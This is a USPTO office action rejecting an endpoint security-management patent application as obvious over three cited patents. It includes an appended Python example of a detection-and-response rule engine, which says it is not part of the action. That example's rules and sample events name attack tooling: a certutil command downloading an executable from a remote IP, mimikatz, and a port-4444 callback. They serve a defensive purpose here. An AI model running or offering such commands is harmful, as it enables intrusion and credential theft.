Notice of Pre-AIA or AIA Status
The present application, filed on or after March 16, 2013, is being examined under the first inventor to file provisions of the AIA.

Information Disclosure Statement

1.	The information disclosure statement (IDS) submitted on 9/28/2020 was filed.  The submission is in compliance with the provisions of 37 CFR 1.97.  Accordingly, the information disclosure statement is being considered by the examiner.

DETAILED ACTION
2. 	Pending claims for consideration are claims 1-20. Applicant has amended claim 1.

3. 	A request for continued examination under 37 CFR 1.114, including the fee set forth in 37 CFR 1.17(e), was filed in this application after final rejection. Since this application is eligible for continued examination under 37 CFR 1.114, and the fee set forth in 37 CFR 1.17(e) has been timely paid, the finality of the previous Office action has been withdrawn pursuant to 37 CFR 1.114. Applicant's submission filed on 9/28/2020 has been entered.

Response to Arguments



Claim Rejections - 35 USC § 103

The following is a quotation of 35 U.S.C. 103 which forms the basis for all obviousness rejections set forth in this Office action:
A patent for a claimed invention may not be obtained, notwithstanding that the claimed invention is not identically disclosed as set forth in section 102, if the differences between the claimed invention and the prior art are such that the claimed invention as a whole would have been obvious before the effective filing date of the claimed invention to a person having ordinary skill in the art to which the claimed invention pertains. Patentability shall not be negated by the manner in which the invention was made.



5.	Claims 1-20 are rejected under 35 U.S.C. 103 as being unpatentable over Patent No.: US 9,092,616 B2 to Kumar et al (hereafter referenced as Kumar) in view of Patent No.: US 8,032,940 B1 to Dhanani (hereafter referenced as Dhanani), and in further view of Patent No.: US 7,463,590 B2 to Mualem et al (hereafter referenced as Mualem).
Regarding claim 1, Kumar discloses “a system for providing an integrated, context-aware, security management framework for an enterprise” (tokenization of identities by Security Token Services (STS) intended to facilitate Identity Federation and Single Sign-On (SSO) for web and enterprise applications [Col.3/lines 21-23]), “the system comprising: one or more endpoint devices” (endpoint trust agent [Col.13/lines 4-5]); “and a server configured to communicate and exchange data with the one or more endpoint devices over a network” (server device [Col.13/lines 20-21]), “the server comprising a hardware processor coupled to non-” (endpoint trust agent/server [Fig.8/item 510]), “in real time, or near-real time, functionality of at least one endpoint agent deployed on one of the one or more endpoint devices” (trust supervisor sends real time actions to remediation controller [Col.18/lines 28-39]).
Kumar does not explicitly disclose “provide an integrated development environment (IDE) operably coupled to the interface; input to the IDE, to write, develop, and/or modify, on-the-fly, one or more customized sets of detection and response logic rules to be executed by an endpoint agent”.
However, Dhanani in an analogous art discloses “provide an integrated development environment (IDE) (secure IDE Dhanani [Fig.4/item 200] within server 414) operably coupled to the interface” (coupled to intrusion detection extension interface Dhanani [Fig.4/item 214]); “input to the IDE” (IDE platform extension Dhanani [Fig.4/item 214] interconnected to Client Dhanani [Fig.4/item 412] interface comprising control module security extensions to provide a secure IDE Dhanani [Col.4/lines 35-37]), “to write, develop, and/or modify, on-the-fly, one or more customized sets of detection and response logic rules to be executed by an endpoint agent” (keystore interface security extension 206 of the IDE platform 202 is used to enable the IDE to communicate with (e.g., read and write from) other keystore objects or components Dhanani [Col.5/lines 2-4]).

One of ordinary skill in the art would have been motivated to combine because Kumar teaches a threat identification and remediation process comprising a security management platform comprising an interface with which an authorized user associated with the enterprise can interact to monitor endpoint agent activity via an endpoint trust agent/server, Dhanani discloses a process to provide a secure Integrated development environment, and both are from the same field of endeavor.
Neither Kumar nor Dhanani explicitly discloses “each endpoint device comprising a deployed endpoint agent configured to continuously monitor and record activity on the respective endpoint device and further execute one or more sets of detection and response logic rules for managing the detection of, and response to, any activity associated with the respective endpoint device that poses a potential security threat to the enterprise, receive, from the authorized user via the interface, and output, to the endpoint agent, a customized set of detection and response logic rules.”
However, Mualem in an analogous art discloses “each endpoint device comprising a deployed endpoint agent configured to continuously monitor and record activity on the respective endpoint device” (Network Manager Daemons (NMDs) that perform the processing of the parser and analyzer portions in this embodiment, saving, analyzing, aggregating packets from each threat detection system, and propagating information to processing routines of the IMC Core Mualem [Col.19/lines 38-52]), “and further execute one or more sets of detection and response logic rules for managing” (management and administration portion of threat detection response system Mualem [Fig.3/item 180]) “the detection of, and response to, any activity associated with the respective endpoint device that poses a potential security threat to the enterprise” (threat detection system Mualem [Fig.3]), “receive, from the authorized user via the interface” (permission detection module Mualem [Col.12/lines 23-25]), “and output, to the endpoint agent, a customized set of detection and response logic rules” (threat detection library of rules Mualem [Col.6/lines 60-61]).
Therefore, it would have been obvious to one of ordinary skill in the art before the effective filing date of the claimed invention to modify Kumar’s method for threat identification and remediation, and Dhanani’s secured integrated development environment, with Mualem’s method for threat detection and response, in which a network intrusion detection system (Mualem [Fig.3]) utilizes Network Manager Daemons (NMDs) that perform the processing of the parser and analyzer portions, saving, analyzing, aggregating packets from each threat detection system, and propagating information to processing routines of the IMC Core, in order to provide additional security and data integrity.
Regarding claim 2 in view of claim 1, the references combined disclose “wherein the server is configured to receive, from the endpoint agent, security data based on execution of one or more sets of detection and response logic rules” (the threat signature detection module in step S45 provides a library of rules which evaluate every packet Mualem [Col.6/lines 56-57]).
Regarding claim 3 in view of claim 2, the references combined disclose “wherein the endpoint agent comprises one or more collection modules configured to monitor activities of processes and user on the respective endpoint device in real time, or near-real time, via a range of kernel mode and/or user mode information sources” (mmap extension of packet sockets allows the kernel to make packets available to the analysis modules Mualem [Col.15/lines 34-36]). 
Regarding claim 4 in view of claim 3, the references combined disclose “wherein the one or more collection modules are configured to: generate event data based on the monitoring of activities”(threat analysis Mualem[Fig.3] also see user interface threat management system Mualem[Fig.9]) ;  “and transmit the event data to a logic engine of the endpoint agent (event data transferred from analysis module to threat management system [Fig.9])  to undergo analysis based on execution of detection and response logic rules for the determination of a one or more actions to be performed based on the analysis of the event data” (threat analysis Mualem[Fig.3] also see user interface threat management system Mualem[Fig.9]) 
Regarding claim 5 in view of claim 4, the references combined disclose “wherein the activities comprise one or more events selected from the group consisting of removable media events, file events, session events, network events, name lookup events, process events, registry events, print events, image load events, and object access events”(analyzer portion Mualem[Fig.4/item 244]) .
Regarding claim 6 in view of claim 5, the references combined disclose “wherein the one or more events are selected from the group consisting of process start/stop, insertion/removal of removable media, establishment/termination of network connections, writes to a file system, printing of one or more documents, Domain Name System (DNS) name resolution attempts, and writes to an operating system registry” (reject filter packet, send alert Mualem [Fig.1/item s72-s78]). 
Regarding claim 7 in view of claim 4, the references combined disclose “wherein the set of detection and response logic rules comprises at least one rule statement comprising match criteria and an associated action” (analyzer portion Mualem [Fig.4/item 244]).
Regarding claim 8 in view of claim 7, the references combined disclose “wherein the analysis comprises: comparing the event data with the match criteria” (anomaly detected Mualem [Fig.1/item s20]); “and determine an associated action to be performed by the endpoint agent based on a positive correlation of the event data with the match criteria” (threat signatures used by the threat signature detection module may utilize a generic form. For example, each signature may include: a) A set of actions to take upon a match of the signature Mualem [Col.7/lines 8-15]).
Regarding claim 9 in view of claim 8, the references combined disclose “wherein the associated action is selected from the group consisting of a suppress action, an alert action, a forward action, a block action, a kill process action, an isolate action, and a set action.” (reject filter packet, send alert Mualem [Fig.1/item s72-s78]).
Regarding claim 10 in view of claim 9, the references combined disclose “wherein the suppress action comprises preventing recording of event data to a forensic log file in a database based on a positive correlation of the event data with a suppress rule match criteria” (reject filter packet, send alert Mualem[Fig.1/item s72-s78]). 
Regarding claim 11 in view of claim 9, the references combined disclose “wherein the alert action comprises transmitting an alert to the endpoint server indicative of event data requiring attention based on a positive correlation of the event data with an alert rule match criteria” (reject filter packet, send alert Mualem[Fig.1/item s72-s78]).
Regarding claim 12 in view of claim 9, the references combined disclose “wherein the forward action comprises transmitting a communication to the endpoint server comprising a copy of event data based on a positive correlation of the event data with a forward rule match criteria” (set action, reassemble packets, send complete frame Mualem[Fig.1]). 
Regarding claim 13 in view of claim 9, the references combined disclose “wherein the block action comprises blocking execution of a process associated with event data based on a positive correlation of the event data with a block rule match criteria” (reject filter packet, send alert Mualem[Fig.1/item s72-s78]). 
Regarding claim 14 in view of claim 9, the references combined disclose “wherein the kill process action comprises terminating a process associated with event data and having already been executed based on a positive correlation of the event data with a kill process rule match criteria.” (analyzer portion Mualem [Fig.4/item 244]).
Regarding claim 15 in view of claim 9, the references combined disclose “wherein the isolate action comprises isolating, over the network, the endpoint agent and endpoint device from other endpoint agents and endpoint devices” (reject filter packet, send alert Mualem[Fig.1/item s72-s78 ]).
Regarding claim 16 in view of claim 9, the references combined disclose “wherein the set action comprises modifying one or more state variables associated with rule statements of matching criteria.” (analyzer portion Mualem [Fig.4/item 244]).
Regarding claim 17 in view of claim 1, the references combined disclose “wherein the one or more customized sets of detection and response logic rules are generated based on a custom, declarative programming language, wherein the custom, declarative programming language is compiled, via a compiler module, into byte code, wherein the compiler module is configured to output a compiled rule set.”(threat detection module Mualem [Fig.3]). 
Regarding claim 18 in view of claim 17, the references combined disclose “wherein the customized set of detection and response logic rules outputted from the server comprises a compiled rule set embedded into an installer executable by the endpoint agent to thereby transmit the compiled rule set to the endpoint agent such that” (threat detection module Mualem [Fig.3]).
Regarding claim 19 in view of claim 1, the references combined disclose “wherein the authorized user is an individual or group tasked with managing the enterprise's security posture and the enterprise comprises at least one of a business entity, company, organization, and government agency” (FIG. 9 can be used to consolidate and correlate a plurality of identity, inventory and log management systems in order to determine a reputation of a subject e.g., a user, device, transaction, service, or organization/company Mualem[Col.20/ line 64-67]). 
Regarding claim 20 in view of claim 1, the references combined disclose “wherein the customized set of detection and response logic rules is based on at least one of the enterprise's operations, the enterprise's infrastructure, user-based processes within the enterprise, the enterprise's security policies, industry-specific rules and regulations associated with the enterprise, known security threats and techniques, and new emerging security threats and techniques” (threat detection module Mualem [Fig.3]).
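The rule-engine structure recited in claims 7-18 (rule statements pairing match criteria with an associated action; the suppress, alert, forward, block, kill process, isolate and set actions; state variables modified by the set action; a declarative rule language compiled into a rule set executed by the endpoint agent) is illustrated by the following added example. It is not part of this Office action, the application, or any of the cited references (Kumar, Dhanani, Mualem); the rule syntax, rule names, event field names and sample events are assumptions constructed for illustration only.

```python
"""Toy endpoint detection-and-response rule engine (added illustration).

Everything here is constructed for the example: the rule syntax, rule names,
event fields and sample events are not taken from the application or from the
Kumar, Dhanani or Mualem patents.

Hypothetical rule line syntax:
    <name>: <field>=<glob>[, <field>=<glob> ...] -> <action>[:<argument>]
A field written as $var is matched against the engine's state variables
(populated by an earlier "set:var=value" action) instead of the event.
"""
from __future__ import annotations

from dataclasses import dataclass
from fnmatch import fnmatchcase

ACTIONS = {"suppress", "alert", "forward", "block", "kill", "isolate", "set"}


@dataclass
class Rule:
    name: str
    match: dict[str, str]      # match criteria: field -> glob pattern
    action: str
    arg: str | None = None     # only the set action carries an argument


def compile_rules(text: str) -> list[Rule]:
    """Turn the declarative rule text into the rule set the agent executes."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # strip comments and blanks
        if not line:
            continue
        lhs, action = line.split("->", 1)
        name, cond = lhs.split(":", 1)
        match = {}
        for pair in cond.split(","):
            key, pattern = pair.split("=", 1)
            match[key.strip()] = pattern.strip()
        action, _, arg = action.strip().partition(":")
        if action not in ACTIONS:
            raise ValueError(f"{name.strip()}: unknown action {action!r}")
        rules.append(Rule(name.strip(), match, action, arg or None))
    return rules


class Engine:
    """Evaluates each event against every rule and carries out the fired actions."""

    def __init__(self, rules: list[Rule]) -> None:
        self.rules = rules
        self.state: dict[str, str] = {}   # state variables touched by "set"
        self.forensic_log: list[dict] = []  # events recorded (suppressed ones are not)
        self.outbound: list[dict] = []    # alerts / forwarded copies sent to the server
        self.blocked: list = []           # pids prevented from executing
        self.killed: list = []            # pids of already-running processes terminated
        self.isolated = False             # host cut off from other endpoints

    def _matches(self, rule: Rule, event: dict) -> bool:
        for key, pattern in rule.match.items():
            source = self.state if key.startswith("$") else event
            value = source.get(key.lstrip("$"))
            if value is None or not fnmatchcase(str(value), pattern):
                return False
        return True

    def process(self, event: dict) -> list[tuple[str, str]]:
        """Return the (rule name, action) pairs fired for one event, applying each action."""
        fired, record = [], True
        for rule in self.rules:
            if not self._matches(rule, event):
                continue
            fired.append((rule.name, rule.action))
            if rule.action == "suppress":           # keep the event out of the forensic log
                record = False
            elif rule.action in ("alert", "forward"):  # message to the endpoint server
                self.outbound.append({"type": rule.action, "rule": rule.name, "event": event})
            elif rule.action == "block":            # stop the process before it runs
                self.blocked.append(event.get("pid"))
            elif rule.action == "kill":             # terminate a process already executing
                self.killed.append(event.get("pid"))
            elif rule.action == "isolate":          # network-isolate this endpoint
                self.isolated = True
            elif rule.action == "set":              # update a state variable for later rules
                var, _, val = rule.arg.partition("=")
                self.state[var] = val
        if record:
            self.forensic_log.append(event)
        return fired


# Constructed rule set: one rule per action type, plus a stateful two-stage rule.
RULES_TEXT = """
# name:     match criteria                                       -> action
log_noise:  type=file, path=/var/log/*                           -> suppress
dl_tool:    type=process, image=*certutil.exe, cmdline=*urlcache* -> alert
dl_seen:    type=process, image=*certutil.exe                    -> set:dropper_seen=1
c2_after:   type=network, $dropper_seen=1, dst_port=4444         -> isolate
credtool:   type=process, image=*mimikatz.exe                    -> kill
usb_exec:   type=process, image=/media/usb/*                     -> block
dns_onion:  type=dns, query=*.onion                              -> forward
"""

# Constructed sample events in the order the collection modules would emit them.
EVENTS = [
    {"type": "file", "path": "/var/log/syslog", "op": "write"},
    {"type": "process", "pid": 412, "image": "C:/Windows/System32/certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://203.0.113.5/a.exe"},
    {"type": "network", "pid": 412, "dst": "203.0.113.5", "dst_port": 4444},
    {"type": "process", "pid": 777, "image": "C:/Users/x/mimikatz.exe", "cmdline": "mimikatz.exe"},
    {"type": "process", "pid": 900, "image": "/media/usb/run.sh", "cmdline": "run.sh"},
    {"type": "dns", "query": "abc.onion"},
    {"type": "file", "path": "/home/u/a.txt", "op": "write"},
]


def run_demo() -> tuple[Engine, list[list[tuple[str, str]]]]:
    """Compile the rules, feed the sample events through, return engine and per-event results."""
    engine = Engine(compile_rules(RULES_TEXT))
    return engine, [engine.process(ev) for ev in EVENTS]


if __name__ == "__main__":
    eng, results = run_demo()
    for ev, fired in zip(EVENTS, results):
        print(ev["type"], "->", fired or "no match")
    print("logged:", len(eng.forensic_log), "isolated:", eng.isolated, "state:", eng.state)
```

Two design points are worth noting against the claims: the suppress action decides only whether the event reaches the forensic log, it does not stop later rules from evaluating the same event; and the isolate rule fires only after a state variable has been set by an earlier matching event, which is how a set action lets a single-event rule language express a two-stage sequence.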

Conclusion

Any inquiry concerning this communication or earlier communications from the examiner should be directed to MICHAEL D ANDERSON whose telephone number is (571)270-5159.  The examiner can normally be reached on Mon-Fri 9am-6pm.

If attempts to reach the examiner by telephone are unsuccessful, the examiner’s supervisor, Yin-Chen Shaw can be reached on (571) 272-8878.  The fax phone number for the organization where this application or proceeding is assigned is 571-273-8300.
Information regarding the status of an application may be obtained from the Patent Application Information Retrieval (PAIR) system.  Status information for published applications may be obtained from either Private PAIR or Public PAIR.  Status information for unpublished applications is available through Private PAIR only.  For more information about the PAIR system, see https://ppair-my.uspto.gov/pair/PrivatePair. Should you have questions on access to the Private PAIR system, contact the Electronic Business Center (EBC) at 866-217-9197 (toll-free). If you would like assistance from a USPTO Customer Service Representative or access to the automated information system, call 800-786-9199 (IN USA OR CANADA) or 571-272-1000.
	


/MICHAEL D ANDERSON/
Examiner, Art Unit 2432      

/JOHN B KING/Primary Examiner, Art Unit 2498